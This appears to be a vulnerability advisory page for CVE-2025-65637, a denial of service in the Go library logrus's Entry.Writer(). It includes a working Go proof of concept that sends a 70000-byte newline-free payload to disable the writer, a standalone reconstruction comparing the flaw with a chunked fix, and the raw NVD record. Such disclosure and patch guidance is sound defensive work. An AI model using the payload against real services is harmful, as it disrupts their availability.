Security Vulnerability Report
CVE-2025-65637 CVSS 7.5 HIGH

CVE-2025-65637

Published: 2025-12-04 19:16:05
Last Modified: 2025-12-23 00:26:01

Description

A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:turbopuffer:logrus:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:turbopuffer:logrus:1.9.0:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:turbopuffer:logrus:1.9.2:*:*:*:*:go:*:* - VULNERABLE
github.com/sirupsen/logrus < 1.8.3
github.com/sirupsen/logrus = 1.9.0
github.com/sirupsen/logrus = 1.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2025-65637 PoC - logrus Entry.Writer() DoS
// Demonstrates the DoS in logrus < 1.8.3, 1.9.0 and 1.9.2: Entry.Writer()
// returns an *io.PipeWriter whose read end is drained by a bufio.Scanner with
// the default 64KB token limit. One line longer than that makes the scanner
// fail with "token too long", the read end of the pipe is closed, and every
// later Write on the returned writer fails.
package main

import (
	"fmt"
	"time"

	"github.com/sirupsen/logrus"
)

// generateLargePayload returns size bytes of 'A' with no newline characters,
// so bufio.ScanLines never finds a line boundary.
func generateLargePayload(size int) []byte {
	payload := make([]byte, size)
	for i := range payload {
		payload[i] = 'A'
	}
	return payload
}

func main() {
	log := logrus.New()

	// Build an entry bound to the logger; Writer() logs each scanned line
	// at InfoLevel through this entry.
	entry := &logrus.Entry{
		Logger:  log,
		Time:    time.Now(),
		Level:   logrus.InfoLevel,
		Message: "test",
	}

	// Writer() returns the write end of an io.Pipe; a goroutine scans the
	// read end line by line.
	writer := entry.Writer()

	// bufio.Scanner's default maximum token size is 64KB (65536 bytes);
	// 70000 bytes without a newline exceeds it.
	largePayload := generateLargePayload(70000)

	// The scanner gives up with "token too long" after 64KB and closes the
	// pipe; this Write returns the bytes consumed so far plus an error.
	n, err := writer.Write(largePayload)
	fmt.Printf("Written %d bytes, error: %v\n", n, err)

	// The pipe is closed, so a perfectly normal line now fails too.
	_, err = writer.Write([]byte("normal log message\n"))
	fmt.Printf("Second write error: %v\n", err)

	// The Writer is now permanently unusable (DoS condition).
}

// Mitigation: split large payloads with newlines, or upgrade to a fixed
// version: v1.8.3, v1.9.1, v1.9.3+. The fix chunks the input and keeps the
// writer functioning even if an error is logged.
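The PoC above needs the vulnerable logrus module to run. The following is an added, stand-alone example (not logrus source and not the PoC repository's code) that reconstructs the mechanism the description and the mitigation comment refer to with only the Go standard library: an io.Pipe whose read end is drained by a bufio.Scanner goroutine, once with the default 64KB line limit and once with a chunking split function modelled on the fix's approach. The lineSink type, the scanConfig/exercise helpers and the 70000-byte payload are constructed for this example; the exact code in the upstream fix may differ.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"io"
	"strings"
)

// lineSink stands in for the logger (constructed for this example): it records
// each "log line" the scanner goroutine hands it and any error it reports.
// Only the scanner goroutine writes to it; callers read it after done closes.
type lineSink struct {
	lines []string
	errs  []string
}

func (s *lineSink) print(line string) { s.lines = append(s.lines, line) }

func (s *lineSink) errorf(format string, args ...interface{}) {
	s.errs = append(s.errs, fmt.Sprintf(format, args...))
}

// scanConfig tunes the bufio.Scanner before the read loop starts.
type scanConfig func(*bufio.Scanner)

// newPipeWriter wires an io.Pipe to a goroutine that scans the read end and
// forwards each token to the sink, the shape Entry.Writer() has. The returned
// channel is closed when the goroutine exits.
func newPipeWriter(sink *lineSink, configure scanConfig) (*io.PipeWriter, <-chan struct{}) {
	reader, writer := io.Pipe()
	done := make(chan struct{})
	go func() {
		defer close(done)
		scanner := bufio.NewScanner(reader)
		configure(scanner)
		for scanner.Scan() {
			sink.print(strings.TrimRight(scanner.Text(), "\r\n"))
		}
		if err := scanner.Err(); err != nil {
			sink.errorf("Error while reading from Writer: %s", err)
		}
		// Closing the read end is what makes the failure permanent: every
		// later Write on the returned writer gets io.ErrClosedPipe.
		reader.Close()
	}()
	return writer, done
}

// vulnerableScan keeps the Scanner defaults: bufio.ScanLines with a 64KB
// (bufio.MaxScanTokenSize) limit, so a longer line ends the loop with
// bufio.ErrTooLong ("token too long").
func vulnerableScan(*bufio.Scanner) {}

// chunkedScan models the fix: pin the buffer at the token limit and emit a
// full 64KB chunk whenever the buffer fills, otherwise scan lines as before,
// so no single token can exceed the limit and the loop never aborts.
func chunkedScan(scanner *bufio.Scanner) {
	const chunkSize = bufio.MaxScanTokenSize
	scanner.Buffer(make([]byte, chunkSize), chunkSize)
	scanner.Split(func(data []byte, atEOF bool) (int, []byte, error) {
		if len(data) >= chunkSize {
			return chunkSize, data[:chunkSize], nil
		}
		return bufio.ScanLines(data, atEOF)
	})
}

// result is what a caller of the writer observes: bytes accepted by and error
// from the oversized write, the error from a normal write afterwards, and what
// the "logger" printed and the scanner goroutine reported.
type result struct {
	firstN      int
	firstErr    error
	secondErr   error
	lines, errs []string
}

// exercise writes a 70000-byte line with no newline, then a normal line, then
// closes the writer and waits for the scanner goroutine to drain the pipe.
func exercise(configure scanConfig) result {
	sink := &lineSink{}
	writer, done := newPipeWriter(sink, configure)

	payload := []byte(strings.Repeat("A", 70000)) // constructed oversized line
	n, firstErr := writer.Write(payload)
	_, secondErr := writer.Write([]byte("normal log message\n"))
	writer.Close()
	<-done
	return result{n, firstErr, secondErr, sink.lines, sink.errs}
}

func main() {
	for _, c := range []struct {
		name string
		cfg  scanConfig
	}{{"vulnerable", vulnerableScan}, {"chunked", chunkedScan}} {
		r := exercise(c.cfg)
		fmt.Printf("%s: first write n=%d err=%v; second write err=%v (closed pipe: %t)\n",
			c.name, r.firstN, r.firstErr, r.secondErr, errors.Is(r.secondErr, io.ErrClosedPipe))
		fmt.Printf("%s: %d line(s) logged, scanner errors: %q\n", c.name, len(r.lines), r.errs)
	}
}
```

With the default scanner the first Write is cut off after exactly 65536 bytes with io.ErrClosedPipe, nothing is logged, one "token too long" error is reported, and the second Write fails the same way. With the chunked split both writes succeed and two lines are logged: the first 64KB chunk, then the 4464-byte tail of the unterminated payload joined with "normal log message", because without a newline the scanner has no way to tell where the oversized record ended. That is why callers should still terminate each record written to the Writer with a newline even on fixed versions.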

References

https://github.com/mjuanxd/logrus-dos-poc (Exploit, Third Party Advisory)
https://github.com/mjuanxd/logrus-dos-poc/blob/main/README.md (Exploit, Third Party Advisory)
https://github.com/sirupsen/logrus/issues/1370 (Exploit, Issue Tracking, Patch)
https://github.com/sirupsen/logrus/pull/1376 (Issue Tracking, Patch)
https://github.com/sirupsen/logrus/releases/tag/v1.8.3 (Release Notes)
https://github.com/sirupsen/logrus/releases/tag/v1.9.1 (Release Notes)
https://github.com/sirupsen/logrus/releases/tag/v1.9.3 (Release Notes)
https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSIRUPSENLOGRUS-5564391 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65637", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:05.223", "lastModified": "2025-12-23T00:26:00.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with \"token too long\" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.8.3", "matchCriteriaId": "B302F48C-A8EA-4FAB-B151-F8492365896C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:1.9.0:*:*:*:*:go:*:*", "matchCriteriaId": "25373732-88E0-4824-B243-9C1E82608B1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:1.9.2:*:*:*:*:go:*:*", "matchCriteriaId": "E59CDE4C-3669-4EA6-AA2D-9BE99FDEC497"}]}]}], "references": [{"url": "https://github.com/mjuanxd/logrus-dos-poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/mjuanxd/logrus-dos-poc/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/sirupsen/logrus/issues/1370", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/sirupsen/logrus/pull/1376", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.8.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.9.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.9.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSIRUPSENLOGRUS-5564391", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}